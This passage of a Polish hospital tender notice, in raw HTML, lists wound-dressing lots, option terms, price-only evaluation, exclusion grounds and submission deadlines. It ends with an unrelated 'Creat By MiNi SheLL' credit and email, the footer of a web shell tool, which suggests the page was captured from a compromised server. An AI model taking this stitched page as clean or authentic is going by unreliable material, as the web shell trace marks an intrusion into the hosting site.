Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet nr	L.p.	Nazwa przedmiotu zamówienia:	J.miary.	Ilość zamawiana<br/>1	2	3	4	5<br/>8	1	Opatrunek hydrokoloidowy – wodoodporny składający się z trzech hydrokoloidów pektyny żelatyny i karboksymetylocelulozy sodowej – zapewnijący szybkie pochłanianie wysięku i wilgotne środowisko gojenia rany(rozmiar 10 x10) opk a max.10sztuk	sztuka	450<br/>8	2	Opatrunek hydrokoloidowy – wodoodporny składający się z trzech hydrokoloidów pektyny żelatyny i karboksymetylocelulozy sodowej – zapewnijący szybkie pochłanianie wysięku i wilgotne środowisko gojenia rany (rozmoiar 15 x15) opk a max.10sztuk	sztuka	400<br/>8	3	Opatrunek hydrokoloidowy – wodoodporny składający się z trzech hydrokoloidów pektyny żelatyny i karboksymetylocelulozy sodowej – zapewnijący szybkie pochłanianie wysięku i wilgotne środowisko gojenia rany(rozmiar 20 x20)opk a 5 sztuka	sztuka	200<br/>8	4	Opatrunek hydrokoloidowy – wodoodporny składający się z trzech różnych hydrokoloidów (pektyny żelatyny i karboksymetylocelulozy sodowej) – zapewnijący wilgotne środowisko gojenia rany(rozmiar 15 x20)opk a max.10sztuk	opakowanie	300<br/>8	5	Opatrunek hydrokoloidowy – cieńki- elastyczny – wodoodporny - półprzezroczysty – samoprzylepny -składający się z trzech różnych hydrokoloidów – żelatyny pektyny i karboksymetylocelulozy sodowej, zapewniający szybkie pochłanianie wysięku i wilgotne środowisko gojenia rany(10 x10)opk a max.5sztuk	sztuka	300<br/>8	6	Opatrunek hydrokoloidowy – cieńki- elastyczny – wodoodporny - półprzezroczysty – samoprzylepny -składający się z trzech różnych hydrokoloidów – żelatyny pektyny i karboksymetylocelulozy sodowej, zapewniający szybkie pochłanianie wysięku i wilgotne środowisko gojenia rany(15 x15)opk a max.5sztuk	sztuka	250<br/>8	7	Opatrunek hydrowłóknisty złożony z dwóch warstw chłonnych produkowany technologią hydrofiber z dodatkiem jonów srebra, zbudowany z nietkanych włókien karboksymetylo celulozy sodowej o wysokich właściwościach absorbcyjnych i szerokim spektrum działania antydrobnoustrojowego do ran zakżonych z dużą ilością wysięku izoluje i eliminuje zakażenia, posiada poprzeczne przesycia które wzmacniają opatrunek i ułatiwają jego zmianę, można go docinać we wszystkich kierunkach(5 x5)opk a max.10 sztuk	sztuka	500<br/>8	8	Opatrunek hydrowłóknisty złożony z dwóch warstw chłonnych produkowany technologią hydrofiber z dodatkiem jonów srebra, zbudowany z nietkanych włókien karboksymetylo celulozy sodowej o wysokich właściwościach absorbcyjnych i szerokim spektrum działania antydrobnoustrojowego do ran zakżonych z dużą ilością wysięku izoluje i eliminuje zakażenia, posiada poprzeczne przesycia które wzmacniają opatrunek i ułatiwają jego zmianę, można go docinać we wszystkich kierunkach(10 x10)opk a 10 sztuka	sztuka	500<br/>8	9	Opatrunek hydrowłóknisty złożony z dwóch warstw chłonnych produkowany technologią hydrofiber z dodatkiem jonów srebra, zbudowany z nietkanych włókien karboksymetylo celulozy sodowej o wysokich właściwościach absorbcyjnych i szerokim spektrum działania antydrobnoustrojowego do ran zakżonych z dużą ilością wysięku izoluje i eliminuje zakażenia, posiada poprzeczne przesycia które wzmacniają opatrunek i ułatiwają jego zmianę, można go docinać we wszystkich kierunkach(15 x 15)opk a max.5 sztuk	sztuka	150<br/>8	10	Opatrunek antybakteryjny ,regulujący poziom wilgotności w ranie .skład wodoodporna zewnętrzna błona poliuretanowa oraz wielowarstwowej częsci chłonnej.część chłonna zawiera warstwę pianki poliuretanowej oraz warstwę kontaktową wykonana w technologii hydrofiber(karboksymetyloceluloza sodowa) z wbudowanymi w strukturę włókien jonami srebra(1,2%).wersja przylepna.rozmiar na piętę 14 x19,8cm.opk a max.5 sztuk	sztuka	180<br/>8	11	Opatrunek antybakteryjny ,regulujący poziom wilgotności w ranie .skład wodoodporna zewnętrzna błona poliuretanowa oraz wielowarstwowej częsci chłonnej.część chłonna zawiera warstwę pianki poliuretanowej oraz warstwę kontaktową wykonana w technologii hydrofiber(karboksymetyloceluloza sodowa) z wbudowanymi w strukturę włókien jonami srebra(1,2%).wersja przylepna.rozmiar na kość krzyżową 16,9 x20 cm opk a max.5 sztuk	sztuka	100<br/>8	12	Żel hydrokoloidowy do uwadniania tkanek tuba 15g	sztuka	80<br/>8	13	Opatrunek hydrowłóknisty złożony z dwóch warstw chłonnych produkowany technologią hydrofiber z dodatkiem jonów srebra, zbudowany z nietkanych włókien karboksymetylo celulozy sodowej o wysokich właściwościach absorbcyjnych i szerokim spektrum działania antydrobnoustrojowego do ran zakżonych z dużą ilością wysięku izoluje i eliminuje zakażenia, posiada poprzeczne przesycia które wzmacniają opatrunek i ułatiwają jego zmianę, można go docinać we wszystkich kierunkach(10x10x max.10 sztuk)	sztuka	50<br/>8	14	Opatrunek piankowy z silikonową warstwą kontaktową 8cm x 8 cm	sztuka	30<br/>8	15	Opatrunek hydrokoloidowy – elastyczny – wodoodporny - półprzezroczysty – samoprzylepny -składający się z trzech różnych hydrokoloidów – żelatyny pektyny i karboksymetylocelulozy sodowej, zapewniający wilgotne środowisko gojenia rany na kość krzyżową( 20x22,5x max.5 sztuk)	sztuka	100<br/>8	16	Opatrunek hydrokoloidowy - elastyczny – wodoodporny - półprzezroczysty – samoprzylepny -składający się z trzech różnych hydrokoloidów – żelatyny pektyny i karboksymetylocelulozy sodowej, zapewniający wilgotne środowisko gojenia rany na piętę(18,5 x19,5)	sztuka	100 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141110-4 - Opatrunki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastosował prawo opcji o którym mowa w art. 441 ustawy Prawo zamówień publicznych. Oznacza to, iż podane w załączniku nr 1 i 2 ilości materiałów są maksymalnym szacunkowym zapotrzebowaniem na okres trwania umowy. Zamawiający zastrzega, że zamówieniem podstawowym objęte jest 90% zamówienia określonego w pakiecie, a pozostałe 10% objęte jest prawem opcji. Zamawiający wykorzysta 90% przedmiotu zamówienia określonego w pakiecie. Pozostałe 10 % Zamawiający wykorzysta w trakcie obowiązywania umowy, pod warunkiem zaistnienia zwiększonego zapotrzebowania na materiały opatrunkowe celem zapewnienia pacjentom właściwego leczenia w związku z rzeczywistymi potrzebami diagnostycznymi pacjentów Zamawiającego lub ze względu na zwiększony ruch pacjentów w jednostkach klinicznych. Z tytułu niewykorzystania pełnej ilości zamówienia nie przysługują Wykonawcy wobec Zamawiającego roszczenia odszkodowawcze. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający dokona badania i oceny ofert. Każdy pakiet będzie oceniany oddzielnie. Wykonawca określi cenę na każdy pakiet oddzielnie w formularzu Oferta.<br/>2.	Ocenie będą podlegać oferty niepodlegające odrzuceniu.<br/>3.	Zamawiający wybiera najkorzystniejszą ofertę na podstawie kryteriów oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1)	PAKIETY 1,2,3,4,5,6,7,8<br/>Wykonawca, na potwierdzenie, że oferowany przedmiot zamówienia spełnia określone przez zamawiającego wymagania składa wraz z ofertą Oświadczenie wykonawcy zawarte w Załączniku nr 1 do SWZ.<br/>2)	PAKIET 2 poz. 7<br/>Aktualna karta techniczna oferowanego materiału.<br/>3)	PAKIET 2 poz. 1, 4, 5, 6, 10<br/>Dokument potwierdzający metodę sterylizacji parą wodną. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1)	PAKIETY 1,2,3,4,5,6,7,8<br/>Wykonawca, na potwierdzenie, że oferowany przedmiot zamówienia spełnia określone przez zamawiającego wymagania składa wraz z ofertą Oświadczenie wykonawcy zawarte w Załączniku nr 1 do SWZ.<br/>2)	PAKIET 2 poz. 7<br/>Aktualna karta techniczna oferowanego materiału.<br/>3)	PAKIET 2 poz. 1, 4, 5, 6, 10<br/>Dokument potwierdzający metodę sterylizacji parą wodną. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> INNE, NIEZBĘDNE DOKUMENTY DO OFERTY:<br/>1.	Formularz OFERTA, wg wzoru Zamawiającego, o treści odpowiadającej załącznikowi nr 1 do SWZ.<br/>2.	Formularz/e asortymentowo-cenowy/e, wg wzoru Zamawiającego, o treści odpowiadającej załącznikowi nr 2 do SWZ na pakiety dowolnie wybrane przez Wykonawcę .<br/>3.	Pełnomocnictwo zgodnie z art. 58 ust. 2 ustawy Prawo zamówień publicznych w przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4.	Dokumenty potwierdzające, że zastrzeżone w ofercie informacje stanowią tajemnicę przedsiębiorstwa, jeżeli Wykonawca zastrzega w ofercie informacje stanowiące tajemnicę przedsiębiorstwa. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie o niepodleganiu<br/>wykluczeniu składa każdy z wbiegających się o udzielenie zamówienia wykonawca.Oświadczenie te może być złożone<br/>przez pełnomocnika, jednakże musi dotyczyć wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2. W przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, wykonawcy ci<br/>składają jedną ofertę, która musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia.<br/>3. W przypadku Wykonawców wspólnie, występujących przed dniem zawarcia umowy w sprawie zamówienia publicznego,<br/>dostarczona będzie Zamawiającemu umowa regulująca zasady współpracy uczestników postępowania w formie kopii<br/>poświadczonej za zgodność z oryginałem przez Wykonawcę. Umowa taka winna określać strony umowy, cel działania,<br/>sposób współdziałania, zakres prac przewidzianych do wykonania każdemu z nich, solidarną odpowiedzialność za<br/>wykonanie zamówienia, oznaczenie czasu trwania konsorcjum (obejmującego okres realizacji przedmiotu zamówienia,<br/>gwarancji i rękojmi), wykluczenie możliwości wypowiedzenia umowy konsorcjum przez któregokolwiek z jego członków do<br/>czasu wykonania zamówienia.<br/>4. W przypadku Wykonawców występujących w formie spółki cywilnej, przed dniem zawarcia umowy w sprawie zamówienia<br/>publicznego, dostarczona będzie Zamawiającemu umowa spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zawiera wzór umowy stanowiący załącznik nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Oferty należy składać za pośrednictwem Platformy zakupowej Open Nexus: https://platformazakupowa.pl/transakcja/728005</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-28 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-29</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p> <p class="mb-0">Część 6 : <span class="normal">Tak</span></p> <p class="mb-0">Część 7 : <span class="normal">Tak</span></p> <p class="mb-0">Część 8 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na podstawie art. 108 ust. 1 ustawy Pzp oraz art. 109 ust. 1 pkt 4, 5, 6, 7, 8, 9 i 10 ustawy Pzp. oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 r. poz. 835).<br/>OŚWIADCZENIA SKŁADANE WRAZ Z OFERTĄ<br/>Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania na podstawie art. 108 ust. 1 ustawy Pzp oraz art. 109 ust. 1 pkt 4, 5, 6, 7, 8, 9 i 10 ustawy Pzp. oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 r. poz. 835).według wzoru, stanowiącego załącznik nr 2 do SWZ.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie składa każdy z wbiegających się o udzielenie zamówienia wykonawca. Oświadczenie te może być złożone przez pełnomocnika, jednakże musi dotyczyć wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com